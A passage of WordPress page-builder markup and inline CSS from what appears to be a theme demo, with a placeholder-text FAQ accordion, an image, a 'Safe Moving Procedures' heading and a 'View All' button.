span{\nmargin-top: 10px;margin-bottom: 10px;margin-right: 10px;margin-left: 10px;}\n.skt-blocks-block-34ee5663 .skt-blocks-icon svg{\nwidth: 12px;height: 12px;font-size: 12px;}\n.skt-blocks-block-34ee5663 .skt-blocks-icon-active svg{\nwidth: 12px;height: 12px;font-size: 12px;}\n}\n</style><style type=\"text/css\"> .skt-blocks-accordion-titles-button.skt-blocks-accordion-titles {\n color: undefined; background-color: #FFFFFF; }\n .skt-blocks-accordion-item-active .skt-blocks-accordion-titles-button.skt-blocks-accordion-titles {\n color: undefined; background-color: undefined; }\n</style><div class=\"skt-blocks-accordion__wrap skt-blocks-buttons-layout-wrap\"><!-- wp:skt-blocks/accordion-item {\"block_id\":\"efde8242\",\"title\":\"Real Estate Law\",\"content\":\"Nullam eget luctu, quis sollicitau. Suspendisse biendum congue purust ristique est aicinelitd olo recons equ untur natus auda.\",\"borderStyle\":\"none\",\"titlePadding\":20,\"contentPadding\":20,\"className\":\"gb-renovation-tab\"} -->\n<div class=\"wp-block-skt-blocks-accordion-item skt-blocks-accordion-item__outer-wrap skt-blocks-block-efde8242 gb-renovation-tab\" style=\"border-style:none;border-width:1px;border-radius:2px;overflow:hidden;box-shadow:9px 9px 9px 9px undefined \"><div class=\"skt-blocks-accordion-item__wrapper\"><div class=\"skt-blocks-accordion-item\" role=\"tab\" tabindex=\"0\"><div class=\"skt-blocks-accordion-titles-button skt-blocks-accordion-titles\" style=\"box-shadow:;padding:20px\"><span class=\"skt-blocks-icon skt-blocks-accordion-icon-wrap\"><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 448 512\"><path d=\"M416 208H272V64c0-17.67-14.33-32-32-32h-32c-17.67 0-32 14.33-32 32v144H32c-17.67 0-32 14.33-32 32v32c0 17.67 14.33 32 32 32h144v144c0 17.67 14.33 32 32 32h32c17.67 0 32-14.33 32-32V304h144c17.67 0 32-14.33 32-32v-32c0-17.67-14.33-32-32-32z\"></path></svg></span><span class=\"skt-blocks-icon-active skt-blocks-accordion-icon-wrap\"><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 448 512\"><path d=\"M416 208H32c-17.67 0-32 14.33-32 32v32c0 17.67 14.33 32 32 32h384c17.67 0 32-14.33 32-32v-32c0-17.67-14.33-32-32-32z\"></path></svg></span><span class=\"skt-blocks-title\">Real Estate Law</span></div><div class=\"skt-blocks-accordion-content\"><span style=\"margin:0;padding:20px\"><p>Nullam eget luctu, quis sollicitau. Suspendisse biendum congue purust ristique est aicinelitd olo recons equ untur natus auda.</p></span></div></div></div></div>\n<!-- /wp:skt-blocks/accordion-item -->\n\n<!-- wp:skt-blocks/accordion-item {\"block_id\":\"43a5459d\",\"title\":\"The industry standard\",\"content\":\"Nullam eget luctu, quis sollicitau. Suspendisse biendum congue purust ristique est aicinelitd olo recons equ untur natus auda.\",\"borderStyle\":\"none\",\"titlePadding\":20,\"contentPadding\":20,\"className\":\"gb-renovation-tab\"} -->\n<div class=\"wp-block-skt-blocks-accordion-item skt-blocks-accordion-item__outer-wrap skt-blocks-block-43a5459d gb-renovation-tab\" style=\"border-style:none;border-width:1px;border-radius:2px;overflow:hidden;box-shadow:9px 9px 9px 9px undefined \"><div class=\"skt-blocks-accordion-item__wrapper\"><div class=\"skt-blocks-accordion-item\" role=\"tab\" tabindex=\"0\"><div class=\"skt-blocks-accordion-titles-button skt-blocks-accordion-titles\" style=\"box-shadow:;padding:20px\"><span class=\"skt-blocks-icon skt-blocks-accordion-icon-wrap\"><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 448 512\"><path d=\"M416 208H272V64c0-17.67-14.33-32-32-32h-32c-17.67 0-32 14.33-32 32v144H32c-17.67 0-32 14.33-32 32v32c0 17.67 14.33 32 32 32h144v144c0 17.67 14.33 32 32 32h32c17.67 0 32-14.33 32-32V304h144c17.67 0 32-14.33 32-32v-32c0-17.67-14.33-32-32-32z\"></path></svg></span><span class=\"skt-blocks-icon-active skt-blocks-accordion-icon-wrap\"><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 448 512\"><path d=\"M416 208H32c-17.67 0-32 14.33-32 32v32c0 17.67 14.33 32 32 32h384c17.67 0 32-14.33 32-32v-32c0-17.67-14.33-32-32-32z\"></path></svg></span><span class=\"skt-blocks-title\">The industry standard</span></div><div class=\"skt-blocks-accordion-content\"><span style=\"margin:0;padding:20px\"><p>Nullam eget luctu, quis sollicitau. Suspendisse biendum congue purust ristique est aicinelitd olo recons equ untur natus auda.</p></span></div></div></div></div>\n<!-- /wp:skt-blocks/accordion-item -->\n\n<!-- wp:skt-blocks/accordion-item {\"block_id\":\"e85130f1\",\"title\":\"Unknown printer galley\",\"content\":\"Nullam eget luctu, quis sollicitau. Suspendisse biendum congue purust ristique est aicinelitd olo recons equ untur natus auda.\",\"borderStyle\":\"none\",\"titlePadding\":20,\"contentPadding\":20,\"className\":\"gb-renovation-tab\"} -->\n<div class=\"wp-block-skt-blocks-accordion-item skt-blocks-accordion-item__outer-wrap skt-blocks-block-e85130f1 gb-renovation-tab\" style=\"border-style:none;border-width:1px;border-radius:2px;overflow:hidden;box-shadow:9px 9px 9px 9px undefined \"><div class=\"skt-blocks-accordion-item__wrapper\"><div class=\"skt-blocks-accordion-item\" role=\"tab\" tabindex=\"0\"><div class=\"skt-blocks-accordion-titles-button skt-blocks-accordion-titles\" style=\"box-shadow:;padding:20px\"><span class=\"skt-blocks-icon skt-blocks-accordion-icon-wrap\"><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 448 512\"><path d=\"M416 208H272V64c0-17.67-14.33-32-32-32h-32c-17.67 0-32 14.33-32 32v144H32c-17.67 0-32 14.33-32 32v32c0 17.67 14.33 32 32 32h144v144c0 17.67 14.33 32 32 32h32c17.67 0 32-14.33 32-32V304h144c17.67 0 32-14.33 32-32v-32c0-17.67-14.33-32-32-32z\"></path></svg></span><span class=\"skt-blocks-icon-active skt-blocks-accordion-icon-wrap\"><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 448 512\"><path d=\"M416 208H32c-17.67 0-32 14.33-32 32v32c0 17.67 14.33 32 32 32h384c17.67 0 32-14.33 32-32v-32c0-17.67-14.33-32-32-32z\"></path></svg></span><span class=\"skt-blocks-title\">Unknown printer galley</span></div><div class=\"skt-blocks-accordion-content\"><span style=\"margin:0;padding:20px\"><p>Nullam eget luctu, quis sollicitau. Suspendisse biendum congue purust ristique est aicinelitd olo recons equ untur natus auda.</p></span></div></div></div></div>\n<!-- /wp:skt-blocks/accordion-item -->\n\n<!-- wp:skt-blocks/accordion-item {\"block_id\":\"eb7de836\",\"title\":\"Aldus PageMaker including\",\"content\":\"Nullam eget luctu, quis sollicitau. Suspendisse biendum congue purust ristique est aicinelitd olo recons equ untur natus auda.\",\"borderStyle\":\"none\",\"titlePadding\":20,\"contentPadding\":20,\"className\":\"gb-renovation-tab\"} -->\n<div class=\"wp-block-skt-blocks-accordion-item skt-blocks-accordion-item__outer-wrap skt-blocks-block-eb7de836 gb-renovation-tab\" style=\"border-style:none;border-width:1px;border-radius:2px;overflow:hidden;box-shadow:9px 9px 9px 9px undefined \"><div class=\"skt-blocks-accordion-item__wrapper\"><div class=\"skt-blocks-accordion-item\" role=\"tab\" tabindex=\"0\"><div class=\"skt-blocks-accordion-titles-button skt-blocks-accordion-titles\" style=\"box-shadow:;padding:20px\"><span class=\"skt-blocks-icon skt-blocks-accordion-icon-wrap\"><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 448 512\"><path d=\"M416 208H272V64c0-17.67-14.33-32-32-32h-32c-17.67 0-32 14.33-32 32v144H32c-17.67 0-32 14.33-32 32v32c0 17.67 14.33 32 32 32h144v144c0 17.67 14.33 32 32 32h32c17.67 0 32-14.33 32-32V304h144c17.67 0 32-14.33 32-32v-32c0-17.67-14.33-32-32-32z\"></path></svg></span><span class=\"skt-blocks-icon-active skt-blocks-accordion-icon-wrap\"><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 448 512\"><path d=\"M416 208H32c-17.67 0-32 14.33-32 32v32c0 17.67 14.33 32 32 32h384c17.67 0 32-14.33 32-32v-32c0-17.67-14.33-32-32-32z\"></path></svg></span><span class=\"skt-blocks-title\">Aldus PageMaker including</span></div><div class=\"skt-blocks-accordion-content\"><span style=\"margin:0;padding:20px\"><p>Nullam eget luctu, quis sollicitau. Suspendisse biendum congue purust ristique est aicinelitd olo recons equ untur natus auda.</p></span></div></div></div></div>\n<!-- /wp:skt-blocks/accordion-item --></div></div>\n<!-- /wp:skt-blocks/accordion --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topPaddingMobile\":40,\"blockId\":\"7efd7e06-15e9-4409-bd57-879837f4059f\"} -->\n<style type=\"text/css\"> .block-7efd7e06-15e9-4409-bd57-879837f4059f .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-7efd7e06-15e9-4409-bd57-879837f4059f .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-7efd7e06-15e9-4409-bd57-879837f4059f .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-7efd7e06-15e9-4409-bd57-879837f4059f .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-7efd7e06-15e9-4409-bd57-879837f4059f .skt-blocks-block-column{\n padding-top: 40px; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-7efd7e06-15e9-4409-bd57-879837f4059f\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:image {\"id\":20,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2021/05/faq-img.jpg\" alt=\"\" class=\"wp-image-20\"/></figure>\n<!-- /wp:image --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"b3881bfe-ff5b-4775-a6c8-e6734143f906\",\"topPadding\":100,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":100,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"opacity\":100,\"backgroundColor\":\"#f7f7f7\",\"backgroundType\":\"color\",\"boxShadowColor\":\"\",\"boxShadowPosition\":\"\",\"className\":\"gb-renovation-section-9\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-9 skt-blocks-block-section-outer-wrap block-b3881bfe-ff5b-4775-a6c8-e6734143f906 background-type-color alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-b3881bfe-ff5b-4775-a6c8-e6734143f906 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-b3881bfe-ff5b-4775-a6c8-e6734143f906 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-b3881bfe-ff5b-4775-a6c8-e6734143f906 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 100px; padding-left: 10px; padding-right: 10px; }\n}\n .block-b3881bfe-ff5b-4775-a6c8-e6734143f906.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-b3881bfe-ff5b-4775-a6c8-e6734143f906.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-b3881bfe-ff5b-4775-a6c8-e6734143f906.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-b3881bfe-ff5b-4775-a6c8-e6734143f906.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-b3881bfe-ff5b-4775-a6c8-e6734143f906.background-type-video .skt-blocks-block-section {\n background-color: rgba(247, 247, 247, 1); }\n</style><style type=\"text/css\"> .block-b3881bfe-ff5b-4775-a6c8-e6734143f906 .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-b3881bfe-ff5b-4775-a6c8-e6734143f906 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-b3881bfe-ff5b-4775-a6c8-e6734143f906.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-b3881bfe-ff5b-4775-a6c8-e6734143f906 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-b3881bfe-ff5b-4775-a6c8-e6734143f906.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-b3881bfe-ff5b-4775-a6c8-e6734143f906 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-b3881bfe-ff5b-4775-a6c8-e6734143f906.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-color:rgba(247, 247, 247, 1);box-shadow:0px 0px 0px 0px  \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"f9f368f3-3d60-4546-bb21-46a4d6d60415\"} -->\n<style type=\"text/css\"> .block-f9f368f3-3d60-4546-bb21-46a4d6d60415 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-f9f368f3-3d60-4546-bb21-46a4d6d60415 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-f9f368f3-3d60-4546-bb21-46a4d6d60415 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-f9f368f3-3d60-4546-bb21-46a4d6d60415 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-f9f368f3-3d60-4546-bb21-46a4d6d60415 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-f9f368f3-3d60-4546-bb21-46a4d6d60415 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-f9f368f3-3d60-4546-bb21-46a4d6d60415 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-f9f368f3-3d60-4546-bb21-46a4d6d60415 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"blockId\":\"6c7f2244-b638-4062-a64f-a98f96e558ed\"} -->\n<style type=\"text/css\"> .block-6c7f2244-b638-4062-a64f-a98f96e558ed .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-6c7f2244-b638-4062-a64f-a98f96e558ed .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-6c7f2244-b638-4062-a64f-a98f96e558ed .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-6c7f2244-b638-4062-a64f-a98f96e558ed .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-6c7f2244-b638-4062-a64f-a98f96e558ed .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-6c7f2244-b638-4062-a64f-a98f96e558ed\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"f9f78eae-449c-455e-8fdd-a5882512983b\",\"showHeading\":false,\"showSeparator\":false,\"subheadSpacing\":5,\"separatorSpacing\":0,\"separatorSpacingTablet\":35,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":17,\"headingTitleFontSizeMobile\":0,\"headingTitleFontWeight\":\"500\",\"headingTitleColor\":\"#fe8333\",\"subHeadingTitleFontFamily\":\"Poppins\",\"subHeadingTitleFontSize\":41,\"subHeadingTitleFontSizeMobile\":30,\"subHeadingTitleFontSizeTablet\":30,\"subHeadingTitleFontWeight\":\"700\",\"subHeadingTitleLineHeight\":1.1,\"subHeadingTitleLetterSpacing\":1,\"subHeadingTitleColor\":\"#253242\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-f9f78eae-449c-455e-8fdd-a5882512983b .responsive-heading-title-text {\n font-size: 17px !important; margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-f9f78eae-449c-455e-8fdd-a5882512983b .responsive-heading-seperator {\n margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-f9f78eae-449c-455e-8fdd-a5882512983b .responsive-heading-desc-text {\n margin-bottom: 5px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-f9f78eae-449c-455e-8fdd-a5882512983b .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-f9f78eae-449c-455e-8fdd-a5882512983b .responsive-heading-seperator {\n margin-bottom: 35px !important; }\n\n.skt-blocks-block-advanced-heading.block-f9f78eae-449c-455e-8fdd-a5882512983b .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-f9f78eae-449c-455e-8fdd-a5882512983b .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-f9f78eae-449c-455e-8fdd-a5882512983b .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-f9f78eae-449c-455e-8fdd-a5882512983b .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-f9f78eae-449c-455e-8fdd-a5882512983b .responsive-heading-title-text {\n font-size: 0px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-f9f78eae-449c-455e-8fdd-a5882512983b .responsive-heading-desc-text {\n font-size: 41px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-f9f78eae-449c-455e-8fdd-a5882512983b .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-f9f78eae-449c-455e-8fdd-a5882512983b .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-f9f78eae-449c-455e-8fdd-a5882512983b {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-f9f78eae-449c-455e-8fdd-a5882512983b {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-f9f78eae-449c-455e-8fdd-a5882512983b {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-f9f78eae-449c-455e-8fdd-a5882512983b\"><p class=\"responsive-heading-desc-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.1;letter-spacing:1px;color:#253242\">Our Safe Moving<br>Procedures</p></div>\n<!-- /wp:skt-blocks/advanced-heading --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"bottomPaddingMobile\":30,\"blockId\":\"0924911c-74b7-4907-822b-208200e225a5\"} -->\n<style type=\"text/css\"> .block-0924911c-74b7-4907-822b-208200e225a5 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-0924911c-74b7-4907-822b-208200e225a5 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-0924911c-74b7-4907-822b-208200e225a5 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-0924911c-74b7-4907-822b-208200e225a5 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-0924911c-74b7-4907-822b-208200e225a5 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-0924911c-74b7-4907-822b-208200e225a5\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/buttons {\"buttonAlignment\":\"right\"} -->\n<div class=\"right tabletAligncenter mobileAligncenter skt-blocks-block-button skt-blocks-buttons__outer-wrap skt-blocks-buttons-stack-none\"><div class=\"skt-blocks-buttons__wrap skt-blocks-buttons-layout-wrap\"><!-- wp:skt-blocks/buttons-child {\"label\":\"View All\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/blog-full-width/\",\"counterId\":\"a3a7f8e1-d3ba-413d-9b6f-e963bd071379\",\"hPadding\":25,\"vMargin\":20,\"hMargin\":0,\"borderRadius\":0,\"borderStyle\":\"none\",\"borderColor\":\"\",\"borderHColor\":\"\",\"color\":\"#ffffff\",\"background\":\"#fe8333\",\"hColor\":\"\",\"buttonFontFamily\":\"Poppins\",\"buttonFontSize\":15,\"hbackground\":\"#0d2e63\",\"buttonFontWeight\":\"600\",\"backgroundType\":\"color\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n.skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 20px !important; margin-bottom: 20px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n.skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n.skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 0px !important; margin-right: 0px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n.skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 10px; margin-right: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 5px; margin-right: 5px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n.skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n.skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n.skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 25px; padding-right: 25px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n.skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\"> .skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379.skt-blocks-button__wrapper .skt-blocks-button__link_child {\n color: #ffffff; }\n .skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover .skt-blocks-button__link_child {\n color: ; }\n .skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper{\n border-color: ; border-radius: 0px; border-style: none; border-width: 1px; box-shadow: 0px 0px undefined ; }\n .skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a{\n font-size: 15px; font-family: Poppins; font-weight: 600; line-height: undefined; opacity: 1; }\n .skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-button__wrapper:hover {\n border-color: ; }\n</style><style type=\"text/css\"> .skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n background-color: #fe8333; }\n .skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover 